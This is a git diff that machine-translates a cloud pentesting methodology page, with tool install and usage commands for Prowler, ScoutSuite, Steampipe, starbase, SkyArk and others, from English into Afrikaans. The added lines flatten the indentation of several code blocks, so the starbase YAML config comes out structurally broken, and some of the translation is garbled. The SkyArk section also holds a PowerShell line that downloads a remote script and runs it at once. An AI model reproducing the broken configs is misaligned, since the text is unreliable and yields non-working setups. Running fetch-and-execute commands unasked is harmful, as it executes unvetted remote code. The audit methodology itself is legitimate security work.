-To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**.
+Om die toetse te begin, moet jy toegang hê met 'n gebruiker met **Leser toestemmings oor die subskripsie** en **Globale Leser rol in AzureAD**. As jy selfs in daardie geval **nie in staat is om toegang te verkry tot die inhoud van die Stoor rekeninge** nie, kan jy dit regstel met die **rol Stoor Rekening Bydraer**.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md
index 0be67db54..473315549 100644
--- a/src/pentesting-cloud/pentesting-cloud-methodology.md
+++ b/src/pentesting-cloud/pentesting-cloud-methodology.md
@@ -6,43 +6,42 @@
 
 ## Basic Methodology
 
-Each cloud has its own peculiarities but in general there are a few **common things a pentester should check** when testing a cloud environment:
+Elke wolk het sy eie eienaardighede, maar oor die algemeen is daar 'n paar **gemeenskaplike dinge wat 'n pentester moet nagaan** wanneer 'n wolkomgewing getoets word:
 
-- **Benchmark checks**
-  - This will help you **understand the size** of the environment and **services used**
-  - It will allow you also to find some **quick misconfigurations** as you can perform most of this tests with **automated tools**
-- **Services Enumeration**
-  - You probably won't find much more misconfigurations here if you performed correctly the benchmark tests, but you might find some that weren't being looked for in the benchmark test.
-  - This will allow you to know **what is exactly being used** in the cloud env
-  - This will help a lot in the next steps
-- **Check exposed assets**
-  - This can be done during the previous section, you need to **find out everything that is potentially exposed** to the Internet somehow and how can it be accessed.
-    - Here I'm taking **manually exposed infrastructure** like instances with web pages or other ports being exposed, and also about other **cloud managed services that can be configured** to be exposed (such as DBs or buckets)
-  - Then you should check **if that resource can be exposed or not** (confidential information? vulnerabilities? misconfigurations in the exposed service?)
-- **Check permissions**
-  - Here you should **find out all the permissions of each role/user** inside the cloud and how are they used
-    - Too **many highly privileged** (control everything) accounts? Generated keys not used?... Most of these check should have been done in the benchmark tests already
-    - If the client is using OpenID or SAML or other **federation** you might need to ask them for further **information** about **how is being each role assigned** (it's not the same that the admin role is assigned to 1 user or to 100)
-  - It's **not enough to find** which users has **admin** permissions "\*:\*". There are a lot of **other permissions** that depending on the services used can be very **sensitive**.
-    - Moreover, there are **potential privesc** ways to follow abusing permissions. All this things should be taken into account and **as much privesc paths as possible** should be reported.
-- **Check Integrations**
-  - It's highly probably that **integrations with other clouds or SaaS** are being used inside the cloud env.
-    - For **integrations of the cloud you are auditing** with other platform you should notify **who has access to (ab)use that integration** and you should ask **how sensitive** is the action being performed.\
-      For example, who can write in an AWS bucket where GCP is getting data from (ask how sensitive is the action in GCP treating that data).
-    - For **integrations inside the cloud you are auditing** from external platforms, you should ask **who has access externally to (ab)use that integration** and check how is that data being used.\
-      For example, if a service is using a Docker image hosted in GCR, you should ask who has access to modify that and which sensitive info and access will get that image when executed inside an AWS cloud.
+- **Benchmark kontroles**
+- Dit sal jou help om **die grootte** van die omgewing en **dienste wat gebruik word** te **begryp**.
+- Dit sal jou ook toelaat om 'n paar **vinnige miskonfigurasies** te vind, aangesien jy die meeste van hierdie toetse met **geoutomatiseerde gereedskap** kan uitvoer.
+- **Dienste Enumerasie**
+- Jy sal waarskynlik nie veel meer miskonfigurasies hier vind as jy die benchmark toetse korrek uitgevoer het nie, maar jy mag dalk sommige vind wat nie in die benchmark toets gesoek is nie.
+- Dit sal jou toelaat om te weet **wat presies gebruik word** in die wolkomgewing.
+- Dit sal baie help in die volgende stappe.
+- **Kontroleer blootgestelde bates**
+- Dit kan gedoen word tydens die vorige afdeling, jy moet **uitvind alles wat potensieel blootgestel is** aan die Internet op een of ander manier en hoe dit toegang kan verkry.
+- Hier neem ek **handmatig blootgestelde infrastruktuur** soos instansies met webbladsye of ander poorte wat blootgestel word, en ook oor ander **wolkkontroleerde dienste wat geconfigureer kan word** om blootgestel te word (soos DB's of emmers).
+- Dan moet jy nagaan **of daardie hulpbron blootgestel kan word of nie** (vertroulike inligting? kwesbaarhede? miskonfigurasies in die blootgestelde diens?).
+- **Kontroleer toestemmings**
+- Hier moet jy **uitvind wat die toestemmings van elke rol/gebruiker** binne die wolk is en hoe dit gebruik word.
+- Te **veel hoogs bevoorregte** (beheer alles) rekeninge? Gekreëerde sleutels wat nie gebruik word?... Die meeste van hierdie kontroles sou reeds in die benchmark toetse gedoen moes gewees het.
+- As die kliënt OpenID of SAML of ander **federasie** gebruik, mag jy hulle moet vra vir verdere **inligting** oor **hoe elke rol toegeken word** (dit is nie dieselfde dat die admin rol aan 1 gebruiker of aan 100 toegeken word nie).
+- Dit is **nie genoeg om te vind** watter gebruikers **admin** toestemmings het "\*:\*". Daar is baie **ander toestemmings** wat, afhangende van die dienste wat gebruik word, baie **sensitief** kan wees.
+- Boonop is daar **potensiële privesc** maniere om te volg deur misbruik van toestemmings. Al hierdie dinge moet in ag geneem word en **so veel privesc paaie as moontlik** moet gerapporteer word.
+- **Kontroleer Integrasies**
+- Dit is hoogs waarskynlik dat **integrasies met ander wolke of SaaS** binne die wolkomgewing gebruik word.
+- Vir **integrasies van die wolk wat jy oudit** met ander platforms moet jy **ken wie toegang het tot (mis)bruik van daardie integrasie** en jy moet vra **hoe sensitief** die aksie wat uitgevoer word is.\
+Byvoorbeeld, wie kan skryf in 'n AWS-emmer waar GCP data van ontvang (vra hoe sensitief die aksie in GCP is wat daardie data hanteer).
+- Vir **integrasies binne die wolk wat jy oudit** van eksterne platforms, moet jy vra **wie toegang het om (mis)bruik te maak van daardie integrasie** en kyk hoe daardie data gebruik word.\
+Byvoorbeeld, as 'n diens 'n Docker-beeld gebruik wat in GCR gehos te is, moet jy vra wie toegang het om dit te wysig en watter sensitiewe inligting en toegang daardie beeld sal kry wanneer dit binne 'n AWS-wolk uitgevoer word.
 
 ## Multi-Cloud tools
 
-There are several tools that can be used to test different cloud environments. The installation steps and links are going to be indicated in this section.
+Daar is verskeie gereedskap wat gebruik kan word om verskillende wolkomgewings te toets. Die installasietappe en skakels sal in hierdie afdeling aangedui word.
 
 ### [PurplePanda](https://github.com/carlospolop/purplepanda)
 
-A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.**
+'n Gereedskap om **slegte konfigurasies en privesc paaie in wolke en oor wolke/SaaS te identifiseer.**
 
 {{#tabs }}
 {{#tab name="Install" }}
-
 ```bash
 # You need to install and run neo4j also
 git clone https://github.com/carlospolop/PurplePanda
@@ -54,29 +53,25 @@ export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687"
 export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda"
 python3 main.py -h # Get help
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 export GOOGLE_DISCOVERY=$(echo 'google:
 - file_path: ""
 
 - file_path: ""
-  service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64)
+service_account_id: "some-sa-email@sidentifier.iam.gserviceaccount.com"' | base64)
 
 python3 main.py -a -p google #Get basic info of the account to check it's correctly configured
 python3 main.py -e -p google #Enumerate the env
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [Prowler](https://github.com/prowler-cloud/prowler)
 
-It supports **AWS, GCP & Azure**. Check how to configure each provider in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws)
-
+Dit ondersteun **AWS, GCP & Azure**. Kyk hoe om elke verskaffer te konfigureer in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws)
 ```bash
 # Install
 pip install prowler
@@ -91,14 +86,12 @@ prowler aws --profile custom-profile [-M csv json json-asff html]
 prowler <provider> --list-checks
 prowler <provider> --list-services
 ```
-
 ### [CloudSploit](https://github.com/aquasecurity/cloudsploit)
 
 AWS, Azure, Github, Google, Oracle, Alibaba
 
 {{#tabs }}
-{{#tab name="Install" }}
-
+{{#tab name="Installeer" }}
 ```bash
 # Install
 git clone https://github.com/aquasecurity/cloudsploit.git
@@ -107,16 +100,13 @@ npm install
 ./index.js -h
 ## Docker instructions in github
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 ## You need to have creds for a service account and set them in config.js file
 ./index.js --cloud google --config </abs/path/to/config.js>
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
@@ -125,8 +115,7 @@ npm install
 AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
 
 {{#tabs }}
-{{#tab name="Install" }}
-
+{{#tab name="Installeer" }}
 ```bash
 mkdir scout; cd scout
 virtualenv -p python3 venv
@@ -135,42 +124,36 @@ pip install scoutsuite
 scout --help
 ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 scout gcp --report-dir /tmp/gcp --user-account --all-projects
 ## use "--service-account KEY_FILE" instead of "--user-account" to use a service account
 
 SCOUT_FOLDER_REPORT="/tmp"
 for pid in $(gcloud projects list --format="value(projectId)"); do
-    echo "================================================"
-    echo "Checking $pid"
-    mkdir "$SCOUT_FOLDER_REPORT/$pid"
-    scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid"
+echo "================================================"
+echo "Checking $pid"
+mkdir "$SCOUT_FOLDER_REPORT/$pid"
+scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid"
 done
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [Steampipe](https://github.com/turbot)
 
 {{#tabs }}
-{{#tab name="Install" }}
-Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew:
-
+{{#tab name="Installeer" }}
+Laai Steampipe af en installeer dit ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Of gebruik Brew:
 ```
 brew tap turbot/tap
 brew install steampipe
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 # Install gcp plugin
 steampipe plugin install gcp
@@ -183,13 +166,11 @@ steampipe dashboard
 # To run all the checks from rhe cli
 steampipe check all
 ```
-
 <details>
 
-<summary>Check all Projects</summary>
-
-In order to check all the projects you need to generate the `gcp.spc` file indicating all the projects to test. You can just follow the indications from the following script
+<summary>Kontroleer alle Projekte</summary>
 
+Om al die projekte te kontroleer, moet jy die `gcp.spc` lêer genereer wat al die projekte aandui wat getoets moet word. Jy kan net die aanwysings van die volgende skrif volg.
 ```bash
 FILEPATH="/tmp/gcp.spc"
 rm -rf "$FILEPATH" 2>/dev/null
@@ -197,32 +178,30 @@ rm -rf "$FILEPATH" 2>/dev/null
 # Generate a json like object for each project
 for pid in $(gcloud projects list --format="value(projectId)"); do
 echo "connection \"gcp_$(echo -n $pid | tr "-" "_" )\" {
-    plugin  = \"gcp\"
-    project = \"$pid\"
+plugin  = \"gcp\"
+project = \"$pid\"
 }" >> "$FILEPATH"
 done
 
 # Generate the aggragator to call
 echo 'connection "gcp_all" {
-  plugin      = "gcp"
-  type        = "aggregator"
-  connections = ["gcp_*"]
+plugin      = "gcp"
+type        = "aggregator"
+connections = ["gcp_*"]
 }' >> "$FILEPATH"
 
 echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generated"
 ```
-
 </details>
 
-To check **other GCP insights** (useful for enumerating services) use: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights)
+Om **ander GCP insigte** te kontroleer (nuttig vir die opspoor van dienste) gebruik: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights)
 
-To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
+Om Terraform GCP kode te kontroleer: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
 
-More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)
+Meer GCP plugins van Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)
 {{#endtab }}
 
 {{#tab name="AWS" }}
-
 ```bash
 # Install aws plugin
 steampipe plugin install aws
@@ -246,29 +225,27 @@ cd steampipe-mod-aws-compliance
 steampipe dashboard # To see results in browser
 steampipe check all --export=/tmp/output4.json
 ```
+Om Terraform AWS kode te kontroleer: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
 
-To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
-
-More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)
+Meer AWS-inproppe van Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)
 {{#endtab }}
 {{#endtabs }}
 
 ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite)
 
 AWS, GCP, Azure, DigitalOcean.\
-It requires python2.7 and looks unmaintained.
+Dit vereis python2.7 en lyk ononderhou.
 
 ### Nessus
 
-Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configurations in **Azure** are needed to obtain a **Client Id**.
+Nessus het 'n _**Audit Cloud Infrastructure**_ skandering wat ondersteun: AWS, Azure, Office 365, Rackspace, Salesforce. Sommige ekstra konfigurasies in **Azure** is nodig om 'n **Client Id** te verkry.
 
 ### [**cloudlist**](https://github.com/projectdiscovery/cloudlist)
 
-Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
+Cloudlist is 'n **multi-cloud hulpmiddel om Bate** (Gasname, IP Adresse) van Cloud Verskaffers te verkry.
 
 {{#tabs }}
 {{#tab name="Cloudlist" }}
-
 ```bash
 cd /tmp
 wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip
@@ -276,46 +253,40 @@ unzip cloudlist_1.0.1_macOS_arm64.zip
 chmod +x cloudlist
 sudo mv cloudlist /usr/local/bin
 ```
-
 {{#endtab }}
 
-{{#tab name="Second Tab" }}
-
+{{#tab name="Tweede Tab" }}
 ```bash
 ## For GCP it requires service account JSON credentials
 cloudlist -config </path/to/config>
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [**cartography**](https://github.com/lyft/cartography)
 
-Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
+Cartography is 'n Python-gereedskap wat infrastruktuur bates en die verhoudings tussen hulle in 'n intuïtiewe grafiekweergave saamvoeg, aangedryf deur 'n Neo4j-databasis.
 
 {{#tabs }}
 {{#tab name="Install" }}
-
 ```bash
 # Installation
 docker image pull ghcr.io/lyft/cartography
 docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help
 ## Install a Neo4j DB version 3.5.*
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```bash
 docker run --platform linux/amd64 \
-     --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \
-     -e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \
-     -e NEO4j_PASSWORD="s3cr3t" \
-     ghcr.io/lyft/cartography  \
-     --neo4j-uri bolt://host.docker.internal:7687 \
-     --neo4j-password-env-var NEO4j_PASSWORD \
-     --neo4j-user neo4j
+--volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \
+-e GOOGLE_APPLICATION_CREDENTIALS="/application_default_credentials.json" \
+-e NEO4j_PASSWORD="s3cr3t" \
+ghcr.io/lyft/cartography  \
+--neo4j-uri bolt://host.docker.internal:7687 \
+--neo4j-password-env-var NEO4j_PASSWORD \
+--neo4j-user neo4j
 
 
 # It only checks for a few services inside GCP (https://lyft.github.io/cartography/modules/gcp/index.html)
@@ -326,17 +297,15 @@ docker run --platform linux/amd64 \
 ## Google Kubernetes Engine
 ### If you can run starbase or purplepanda you will get more info
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [**starbase**](https://github.com/JupiterOne/starbase)
 
-Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
+Starbase versamel bates en verhoudings van dienste en stelsels, insluitend wolkinfrastruktuur, SaaS-toepassings, sekuriteitsbeheer, en meer in 'n intuïtiewe grafiekweergave wat deur die Neo4j-databasis ondersteun word.
 
 {{#tabs }}
-{{#tab name="Install" }}
-
+{{#tab name="Installeer" }}
 ```bash
 # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/
 npm install --global yarn
@@ -359,44 +328,40 @@ docker build --no-cache -t starbase:latest .
 docker-compose run starbase setup
 docker-compose run starbase run
 ```
-
 {{#endtab }}
 
 {{#tab name="GCP" }}
-
 ```yaml
 ## Config for GCP
 ### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
 ### It requires service account credentials
 
 integrations:
-  - name: graph-google-cloud
-    instanceId: testInstanceId
-    directory: ./.integrations/graph-google-cloud
-    gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
-    config:
-      SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}"
-      PROJECT_ID: ""
-      FOLDER_ID: ""
-      ORGANIZATION_ID: ""
-      CONFIGURE_ORGANIZATION_PROJECTS: false
+- name: graph-google-cloud
+instanceId: testInstanceId
+directory: ./.integrations/graph-google-cloud
+gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
+config:
+SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}"
+PROJECT_ID: ""
+FOLDER_ID: ""
+ORGANIZATION_ID: ""
+CONFIGURE_ORGANIZATION_PROJECTS: false
 
 storage:
-  engine: neo4j
-  config:
-    username: neo4j
-    password: s3cr3t
-    uri: bolt://localhost:7687
-    #Consider using host.docker.internal if from docker
+engine: neo4j
+config:
+username: neo4j
+password: s3cr3t
+uri: bolt://localhost:7687
+#Consider using host.docker.internal if from docker
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### [**SkyArk**](https://github.com/cyberark/SkyArk)
 
-Discover the most privileged users in the scanned AWS or Azure environment, including the AWS Shadow Admins. It uses powershell.
-
+Ontdek die mees bevoorregte gebruikers in die gescande AWS of Azure omgewing, insluitend die AWS Shadow Admins. Dit gebruik powershell.
 ```powershell
 Import-Module .\SkyArk.ps1 -force
 Start-AzureStealth
@@ -405,18 +370,17 @@ Start-AzureStealth
 IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
 Scan-AzureAdmins
 ```
-
 ### [Cloud Brute](https://github.com/0xsha/CloudBrute)
 
-A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
+'n Gereedskap om 'n maatskappy (teiken) infrastruktuur, lêers en toepassings op die top wolkverskaffers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode) te vind.
 
 ### [CloudFox](https://github.com/BishopFox/cloudfox)
 
-- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
-- It is an enumeration tool which is intended to compliment manual pentesting.
-- It doesn't create or modify any data within the cloud environment.
+- CloudFox is 'n gereedskap om uitbuitbare aanvalspaaie in wolkinfrastruktuur te vind (huidiglik slegs AWS & Azure ondersteun met GCP wat kom).
+- Dit is 'n enumerasie-gereedskap wat bedoel is om handmatige pentesting aan te vul.
+- Dit skep of wysig nie enige data binne die wolkomgewing nie.
 
-### More lists of cloud security tools
+### Meer lyste van wolk sekuriteitsgereedskap
 
 - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
 
@@ -446,16 +410,12 @@ aws-security/
 azure-security/
 {{#endref}}
 
-### Attack Graph
+### Aanval Grafiek
 
-[**Stormspotter** ](https://github.com/Azure/Stormspotter)creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.
+[**Stormspotter** ](https://github.com/Azure/Stormspotter) skep 'n “aanval grafiek” van die hulpbronne in 'n Azure intekening. Dit stel rooi span en pentesters in staat om die aanvaloppervlak en draaipunte binne 'n huurder te visualiseer, en versterk jou verdedigers om vinnig te oriënteer en prioriteit te gee aan insidentresponswerk.
 
 ### Office365
 
-You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**.
+Jy het **Global Admin** of ten minste **Global Admin Reader** nodig (maar let daarop dat Global Admin Reader 'n bietjie beperk is). Hierdie beperkings verskyn egter in sommige PS modules en kan omseil word deur toegang te verkry tot die funksies **via die webtoepassing**.
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-